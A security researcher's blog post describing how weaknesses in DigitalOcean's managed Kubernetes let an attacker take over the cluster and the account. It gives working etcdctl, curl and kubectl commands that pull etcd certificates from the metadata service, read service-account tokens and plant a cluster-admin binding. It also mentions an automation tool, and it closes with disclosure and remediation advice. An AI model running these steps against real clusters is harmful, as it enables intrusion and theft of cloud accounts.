DigitalOcean this week announced the wider availability of their managed Kubernetes service. We’re big fans of DigitalOcean so I thought I’d take a look and see how it stacks up security-wise compared to other public cloud providers.

The short version is: not very well.

Unfortunately it appears there’s a series of questionable design decisions that mean, at the time of writing, it would be trivial for an attacker who compromised a single pod or, more likely but much less talked about, found a Server-Side Request Forgery (SSRF) or XML External Entities (XXE) weakness, to not only take over the entire cluster but also take over the associated DigitalOcean account.

Criticising anybody’s hard work is never high up on my list of things to do. I’m a builder at heart and have nothing but love and respect for my fellow engineers and share the excitement of creating new products and services. It’s not a small task building a platform like this. I was at the KubeCon EU 2018 talk where one of DigitalOcean’s engineers gave some insight into their architecture and how they were approaching it.

I can’t speak about the design process they’ve been through but I am surprised that a company as experienced as DigitalOcean have missed some pretty big internal attack vectors. Was any threat modelling done during the project? Were these issues known about and evaluated as within risk appetite or are they new ideas that the DO team hadn’t considered? I don’t know.

I’ve let DigitalOcean know everything that’s in this post and, because it’s not a vulnerability in their platform, I’ve decided it’s ok to discuss my findings. Let me talk you through them.

Metadata, Metadata, Metadata

Every public cloud provider I’ve reviewed has some weakness around metadata. Metadata is detail about your cloud compute instance, typically accessed via an HTTP service on a link-local address inside the cloud provider’s network. This is a necessary part of life when you’re spawning multiple instances of compute nodes from a single image and is quite an elegant solution to the problem. The issue with Kubernetes is that traffic from the pod network is typically NATed out using a node’s IP address in your VPC, so pods can reach the metadata service too.

Most providers use the metadata service to provide bootstrap credentials for the Kubernetes kubelet component and I’ve blogged about this separately and at length. I’ve even written a tool called kubeletmein to enable you to exploit this. DigitalOcean is no different and I’ve updated kubeletmein to include support for DigitalOcean as of v0.6.1.

This problem is made slightly worse on DigitalOcean as, like AWS, they don’t require a custom HTTP request header to fetch data from the metadata service. GKE and Azure both do, which reduces the risk from SSRF and XXE. That’s a blog post for another time.

Etcd???

The kubelet creds by themselves were not that exciting: incredibly useful and incredibly sensitive, but a problem every provider has and one I was expecting. What surprised me more were these values in the user-data at http://169.254.169.254/metadata/v1/user-data:

- k8saas_etcd_ca
- k8saas_etcd_key
- k8saas_etcd_cert

As the names suggest, these contained the CA certificate, client certificate and private key needed to access etcd.



They’re there because the worker node runs flannel for its networking, and flannel needs direct access to etcd. If you take a peek at the node using the DigitalOcean console, you will see the flannel process running.

In case you are not aware, Kubernetes is a bunch of different processes that ultimately use a key value data store to persist its state. This data store is etcd and here we have what appeared to be - and turned out to be - credentials to access it directly. Remember all that RBAC stuff in Kubernetes that really gets in the way if you’re trying to attack it? Well you can forget all that if you can just update etcd directly.

Hacking etcd

My first assumption was that I would need to connect to etcd from inside the cluster, or at least from inside DigitalOcean’s network. Somewhat ironically, it turned out that it was not possible to connect from the cluster, but it was possible to connect from... the Internet. Anywhere. Straight to the etcd service on port 2379 of your master.

It’s possible to configure role-based access control in etcd, but that had not been done, so when I connected to etcd with etcdctl I had full access to read and modify keys.

From here it was a simple step to achieve cluster compromise. There are a bunch of ways to do this, but my personal favourite, from various Kubernetes penetration tests, is to assign the cluster-admin role to a default service account, grab that account’s token (typically from within a pod via the default mount, but in this instance directly from etcd), then use kubectl to do the rest.

I deliberated over this next part for a little while, but ultimately I decided to add the steps. Hacking Kubernetes via etcd is nothing new. If you ever gain access to etcd you’re really only a few Google results from cluster compromise, so I’m not causing DigitalOcean any further headaches by listing the steps. So here goes.

1. Grab the etcd values from metadata

There are a few ways you could do this, of course; it depends on what vulnerability you’ve found. In this instance I’ve just exec’d into a pod and used cURL to grab it directly.

```shell
~ $ curl -qs http://169.254.169.254/metadata/v1/user-data | grep ^k8saas_etcd
k8saas_etcd_ca: "-----BEGIN CERTIFICATE-----\nMIIDJzCCAg+gAwIBAgICBnUwDQYJKoZIhvcNAQELBQAwMzEVMBMREDACTEDCKqW7f2AR5XaWYFsiA==\n-----END CERTIFICATE-----\n"
k8saas_etcd_key: "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEArH2vsEk0XAlFzTdfV7x7ct8ePPsRm+NwItK+ft9KFfquyHSI\nAFo6AeLv31zZ8uapmZcFREDACTEDUFpM2iUlgHCH3sw==\n-----END RSA PRIVATE KEY-----\n"
k8saas_etcd_cert: "-----BEGIN CERTIFICATE-----\nMIIEazCCA1OgAwIBAgICREDACTEDGkp1PuVH3crD2ZdyB\nNmzxYfAVqupWrU9wXwFVGlzKkiOTCVImluhu1LK/Jg==\n-----END CERTIFICATE-----\n"
```

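For each of these values, strip the key name and surrounding quotes, save the value to its own file (the commands below use ca.crt, etcd.key and etcd.crt), and replace the literal \n sequences with actual new lines. In vi, something like :%s/\\n/(Ctrl-V then hit return)/g will work.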
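If you’d rather not edit each value by hand, the conversion can be scripted. The sketch below is a convenience, not part of the original procedure, and it assumes the user-data has been saved to a local file and that each key sits on a single line in the `key: "..."` form shown above. `extract_pem` is a hypothetical helper name.

```shell
#!/usr/bin/env bash
# Hypothetical helper: pull one escaped PEM value out of DigitalOcean
# user-data (read on stdin) and write it to a file with real newlines.
# Assumes the value is on one line as: key: "-----BEGIN ...\n...\n"
extract_pem() {
  local key="$1" out="$2" line value
  # Select the line for this key; grep exits non-zero if it is missing.
  line=$(grep "^${key}: ") || {
    echo "extract_pem: ${key} not found" >&2
    return 1
  }
  # Drop the 'key: "' prefix and the closing double quote.
  value=${line#"${key}: \""}
  value=${value%\"}
  # printf %b turns each literal \n sequence into a newline.
  printf '%b' "$value" > "$out"
}
```

Run it once per key against the saved file, for example `extract_pem k8saas_etcd_key etcd.key < user-data`, and likewise for `ca.crt` and `etcd.crt`.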

2. Use etcdctl to retrieve a service account token secret name

We’ll grab the default service account token from the kube-system namespace. Mainly because we know it will be there.

Make a note of the value k8saas_master_domain_name from metadata. This is the public hostname of your Kubernetes master.

Kubernetes uses a binary encoding scheme for objects it persists to etcd. There are a few ways to work around this, but the easiest is to grab the ever-useful auger tool from GitHub, which pulls out the relevant routines from apimachinery and provides encode/decode functionality.
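For context on why a decoder is needed: objects Kubernetes stores as protobuf begin with the four-byte magic prefix `k8s\0` (hex `6b 38 73 00`), whereas some types, such as custom resources, are stored as plain JSON. The hypothetical helper below only checks for that prefix, which tells you whether a raw value needs decoding before jq can make sense of it. It is a sketch, not part of auger.

```shell
#!/usr/bin/env bash
# Hypothetical helper: succeed if the bytes on stdin start with the
# "k8s\0" magic prefix Kubernetes uses for protobuf-encoded objects.
has_k8s_magic() {
  local magic
  # Read the first four bytes and render them as contiguous hex.
  magic=$(head -c 4 | od -An -tx1 | tr -d ' \n')
  [ "$magic" = "6b387300" ]
}
```

A value fetched with etcdctl’s `--print-value-only` flag can be piped straight into it, e.g. `... get /registry/serviceaccounts/kube-system/default --print-value-only | has_k8s_magic && echo protobuf`.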

Before we start, export the environment variable below to tell etcdctl to use the v3 API, which is what Kubernetes uses.

```shell
$ export ETCDCTL_API=3
```

Now grab the name of the secret from etcd. You run this from your machine, not inside the cluster. Adjust the endpoints below to use the master hostname you noted.

```shell
$ etcdctl --endpoints=https://ac715f35-2fa8-4ba8-9973-211c07741343.k8s.ondigitalocean.com:2379 \
    --cacert=ca.crt --cert=etcd.crt --key=etcd.key \
    get /registry/serviceaccounts/kube-system/default \
    | auger decode -o json | jq -r '.secrets[].name'
default-token-85kf4
```
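Every etcdctl call in this walkthrough repeats the same endpoint and TLS flags. A small wrapper, not part of the original steps, keeps them in one place. It assumes the three PEM files are in the current directory and that `DO_MASTER` (a hypothetical variable name) holds the `k8saas_master_domain_name` value; `CTL_BIN` is also hypothetical and exists only so the function can be dry-run with `echo`.

```shell
#!/usr/bin/env bash
# Hypothetical wrapper around the etcdctl flags used in this post.
# DO_MASTER: the k8saas_master_domain_name value from metadata.
# CTL_BIN:   override (e.g. CTL_BIN=echo) to print the command instead.
do_etcdctl() {
  ETCDCTL_API=3 "${CTL_BIN:-etcdctl}" \
    --endpoints="https://${DO_MASTER:?set DO_MASTER to the master hostname}:2379" \
    --cacert=ca.crt --cert=etcd.crt --key=etcd.key \
    "$@"
}
```

The lookup above then becomes `do_etcdctl get /registry/serviceaccounts/kube-system/default | auger decode -o json | jq -r '.secrets[].name'`. Because a ClusterRoleBinding written straight to etcd lives under a single key, `do_etcdctl del /registry/clusterrolebindings/forearmed:cluster-admin` should remove it again once you’re done.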

3. Grab the token from the secret

```shell
$ etcdctl --endpoints=https://ac715f35-2fa8-4ba8-9973-211c07741343.k8s.ondigitalocean.com:2379 \
    --cacert=ca.crt --cert=etcd.crt --key=etcd.key \
    get /registry/secrets/kube-system/default-token-85kf4 \
    | auger decode -o json | jq -r '.data.token' | base64 --decode > do_kube-system_default_token
```

You now have the token saved in a file called do_kube-system_default_token. You can use this with kubectl, but it has no privileges at the moment. See:

```shell
$ kubectl --server https://ac715f35-2fa8-4ba8-9973-211c07741343.k8s.ondigitalocean.com --token `cat do_kube-system_default_token` get nodes
Error from server (Forbidden): nodes is forbidden: User "system:serviceaccount:kube-system:default" cannot list resource "nodes" in API group "" at the cluster scope
```
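The error is useful in itself: the API server accepted the token and mapped it to `system:serviceaccount:kube-system:default`, so authentication works and only authorisation is failing. Service account tokens of this era are JWTs, so you can also check which identity a token represents offline by decoding its middle (payload) segment. A minimal sketch, assuming the usual `header.payload.signature` layout with base64url encoding and stripped padding; `jwt_payload` is a hypothetical helper and it does not verify the signature.

```shell
#!/usr/bin/env bash
# Hypothetical helper: print the decoded payload of a JWT.
# Does NOT verify the signature; it only makes the claims readable.
jwt_payload() {
  local payload
  # A JWT is header.payload.signature; keep the middle segment.
  payload=$(printf '%s' "$1" | cut -d. -f2)
  # Convert the base64url alphabet back to standard base64.
  payload=$(printf '%s' "$payload" | tr '_-' '/+')
  # JWTs drop '=' padding; restore it so base64 will decode cleanly.
  while [ $(( ${#payload} % 4 )) -ne 0 ]; do
    payload="${payload}="
  done
  printf '%s' "$payload" | base64 --decode
}
```

Running `jwt_payload "$(cat do_kube-system_default_token)" | jq .` should show a `sub` claim matching the user named in the error above.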

4. Assign cluster-admin role to kube-system:default

You could extract an existing ClusterRoleBinding, modify it and insert it back into etcd. A cleaner approach, and one that’s easier to remove once you’re done, is to add a new one. We’re not going through the API here, so to keep Kubernetes happy we need to supply our own creationTimestamp and uid values for the new ClusterRoleBinding object.

Some hacky bash to do this (assuming you have uuidgen installed) is:

```shell
$ export UUID=`uuidgen | tr '[:upper:]' '[:lower:]'`
$ export CREATION_TIMESTAMP=`date -u +%Y-%m-%dT%TZ`
$ cat > forearmed-clusterrolebinding.yaml <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  creationTimestamp: $CREATION_TIMESTAMP
  name: forearmed:cluster-admin
  uid: $UUID
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: ServiceAccount
  name: default
  namespace: kube-system
EOF
```

You should now have a file called forearmed-clusterrolebinding.yaml with the variables substituted. We’ll encode this and put it into etcd.

```shell
$ cat forearmed-clusterrolebinding.yaml | auger encode | \
    etcdctl --endpoints=https://ac715f35-2fa8-4ba8-9973-211c07741343.k8s.ondigitalocean.com:2379 \
    --cacert=ca.crt --cert=etcd.crt --key=etcd.key \
    put /registry/clusterrolebindings/forearmed:cluster-admin
```
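The UUID step assumes `uuidgen` is installed. On a Linux machine without it, the kernel exposes a fresh random UUID at `/proc/sys/kernel/random/uuid`, so a small fallback could stand in for the first export as `export UUID=$(new_uid)`. `new_uid` is a hypothetical helper name; this is a sketch, not a requirement of the procedure.

```shell
#!/usr/bin/env bash
# Hypothetical helper: print a lowercase UUID for the object's uid field.
new_uid() {
  if command -v uuidgen >/dev/null 2>&1; then
    # macOS uuidgen prints uppercase; Kubernetes uids are lowercase.
    uuidgen | tr '[:upper:]' '[:lower:]'
  elif [ -r /proc/sys/kernel/random/uuid ]; then
    # Linux kernel source of random (version 4) UUIDs.
    cat /proc/sys/kernel/random/uuid
  else
    echo "new_uid: no UUID source found" >&2
    return 1
  fi
}
```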

5. Profit

That’s it. You’re now cluster-admin. Check this with the same command as before:

```shell
$ kubectl --server https://ac715f35-2fa8-4ba8-9973-211c07741343.k8s.ondigitalocean.com --token `cat do_kube-system_default_token` get nodes
NAME              STATUS   ROLES    AGE   VERSION
nifty-bell-3asb   Ready    <none>   8h    v1.12.3
nifty-bell-3asw   Ready    <none>   8h    v1.12.3
```

DigitalOcean Account Takeover

With complete control of the cluster we can view any secrets within it. One that grabbed my attention was the digitalocean secret in the kube-system namespace. This, it turns out, is used by the DigitalOcean Container Storage Interface plugin so that you can create storage, PVs, etc.

DigitalOcean has a concept of Personal Access Tokens to enable you to use their API to configure your account and compute requirements. Unfortunately, at the time of writing, there is no IAM capability with DigitalOcean (that I’m aware of) meaning there’s no way to scope privileges. A Personal Access Token is effectively root privileges on your DO account.

The value in the digitalocean secret is exactly that: an access token for your account. Knowing it is enough to control just about any element of the account, from any other Droplets you have running to firing up new ones, adding SSH keys to Droplets, reading data in Spaces, etc.

What is perhaps more concerning, and DigitalOcean have acknowledged this issue, is that this access token is not listed anywhere in your account. As far as you know it doesn’t exist, and as far as I can tell you have no ability to revoke it.

It’s worth pointing out that the recently added Projects capability in DigitalOcean does not provide any kind of security boundary. If you have an access token you see all resources across all projects.

I’m not going to spend any more time on this element. Grab doctl and explore the impact of this for yourselves.

Automating This

UPDATE 20 Dec 2018: I wrote a command line tool to automate the above steps. I wasn’t planning to release this, mainly because it’s pretty bad Go code, but hey, it might be useful in demonstrating the impact. It’s up on GitHub at https://github.com/4ARMED/dopwn.

Remediation Steps

Actually, I’m serious. At the moment you’re pretty stuffed. Kubernetes Network Policy is not yet available on DigitalOcean as they are simply using Flannel for the Pod network, which doesn’t support it. I’ve tried installing Calico on a DO cluster but in my tests it didn’t work, I think because of certain kubelet configuration options which aren’t set. You could hack away at the underlying nodes but that won’t scale.

What did work was Istio. Installing a full service mesh just for this issue is perhaps overkill, but Istio rocks for a bunch of other reasons, so it’s well worth considering anyway.

With Istio installed and the Egress Gateway enabled, by default you will not be able to connect to anything outside the service mesh. Trying to access the metadata service from a pod as before will yield the following:

```shell
~ $ curl http://169.254.169.254/metadata/v1/user-data
curl: (7) Failed to connect to 169.254.169.254 port 80: Connection refused
```

At the moment, as far as I can tell, this is your only realistic option. To reduce the risk, I would strongly recommend you deploy your Kubernetes clusters on DigitalOcean into a completely separate account; otherwise you may lose everything from one relatively small entry point.
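If you do go down the Istio route, it’s worth re-running the metadata check whenever the mesh configuration changes. Here is a sketch of that check as a function you could run from inside a pod, for example as part of a smoke test. It assumes curl is available in the image and treats anything other than an HTTP 200 from the DigitalOcean metadata endpoint as blocked; `metadata_reachable` and `METADATA_URL` are hypothetical names.

```shell
#!/usr/bin/env bash
# Hypothetical check: succeed only if the metadata service answers HTTP 200.
# METADATA_URL can be overridden; it defaults to DigitalOcean's endpoint.
metadata_reachable() {
  local url="${METADATA_URL:-http://169.254.169.254/metadata/v1/}"
  local code
  # -w prints just the status code; curl exits non-zero on connect errors.
  code=$(curl -s -o /dev/null --max-time 3 -w '%{http_code}' "$url") || return 1
  [ "$code" = "200" ]
}
```

Something like `if metadata_reachable; then echo "metadata still exposed"; fi` is enough to flag a regression.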

Summary

Building secure systems is hard. The thing that got me about DigitalOcean’s service was that they’re pretty much last to market. They’re not trying to solve new problems here. A quick read of Google’s GKE Cluster Hardening Guide would have shown the way on at least some of the points I’ve covered here. If we don’t learn from those before us we’re not going to progress very far.

There are a few key points that I feel DigitalOcean need to address:

- Lack of Network Policy - this is a must, soon, not just because of this issue. Inside a Kubernetes cluster is a complete free-for-all by default.

- Removal of etcd creds from metadata - move away from Flannel perhaps, use a network plugin that works through the Kubernetes API.

- Disable Internet access to etcd - possibly not needed if the network layer is changed.

- If etcd is needed, implement RBAC so at least these creds don’t have free rein over the data store, just the /kubernetes/network prefix they need.

- Provide authorisation scopes for API access tokens. Something akin to GitHub’s token scopes, in lieu of a full IAM solution in the short term, would be great.

- The metadata service should only be accessible with a custom HTTP request header (see GCP’s Metadata-Flavor header).
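To make the etcd RBAC recommendation concrete, here is roughly what scoping a client to flannel’s prefix could look like with etcd’s v3 auth commands. Treat it as a sketch under several assumptions: an etcd version whose `user add` supports `--no-password`, client-certificate authentication where the certificate CN is the username (`flannel` here is a hypothetical CN), a `root` user with the `root` role already created, and connection settings supplied through etcdctl’s `ETCDCTL_*` environment variables. The prefix is the one from the recommendation above; `lock_down_etcd` and `CTL_BIN` are hypothetical names.

```shell
#!/usr/bin/env bash
# Sketch: restrict a flannel client certificate to its own etcd prefix.
# Assumes a root user/role already exists (required by "auth enable")
# and that ETCDCTL_ENDPOINTS/ETCDCTL_CACERT/ETCDCTL_CERT/ETCDCTL_KEY are set.
# CTL_BIN=echo prints the commands instead of running them.
lock_down_etcd() {
  local ctl="${CTL_BIN:-etcdctl}"
  local user="${1:-flannel}"               # hypothetical: flannel cert CN
  local prefix="${2:-/kubernetes/network}"

  "$ctl" role add "$user" || return 1
  # The role's only permission: readwrite on keys under the prefix.
  "$ctl" role grant-permission "$user" readwrite "$prefix" --prefix=true || return 1
  # No password: the client certificate CN identifies this user.
  "$ctl" user add "$user" --no-password || return 1
  "$ctl" user grant-role "$user" "$user" || return 1
  # From here on, clients only get what their roles allow.
  "$ctl" auth enable
}
```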

Unfortunately, to me at least, nothing on this list looks like a quick fix. Aside from the metadata header point, I don’t see equivalent issues in any other public cloud provider’s Kubernetes service that I’ve reviewed. That’s a shame, because the experience of firing up a cluster has been in line with the great DO experience we all know and love.

DigitalOcean do a fantastic job of making it easy for developers to get relatively complex architecture up and running with a few clicks in a slick UI or via the API. They’ve definitely upped their security game in the last couple of years, along with the inevitable accreditations that go with that, which were notably absent not that long ago. But simplicity should not come at the expense of good security defaults.

It’s well worth pointing out that there’s no external vulnerability in the service. To compromise a cluster in this way you need a weakness in a customer-deployed app to get even close to exploiting these architectural shortcomings. As we regularly find in our penetration testing work though, these kinds of issues are surprisingly common.

I’m confident these issues with DigitalOcean’s Kubernetes service will be addressed. It’s early days yet and, though it’s available to anyone, including new users, it’s still in what’s called “Limited Availability”. Still, I’m surprised this wasn’t picked up during the earlier, more limited availability phase. I don’t know what security reviews, if any, have been done of the service (interestingly, it’s missing from the scope of their Bug Bounty programme), but this really wasn’t a complicated set of issues to find or exploit.

I was contacted by DO after I tweeted about this and was told via DM that it would be escalated internally. The engineer I spoke with said that “Limited Availability” relates directly to missing features, and that Network Policy is one of those that will be implemented before the service goes to General Availability.

In the meantime, if you’re thinking of using this service, I’d strongly recommend you understand the risks and make any adjustments necessary. Please do get in touch if you would like any help with this.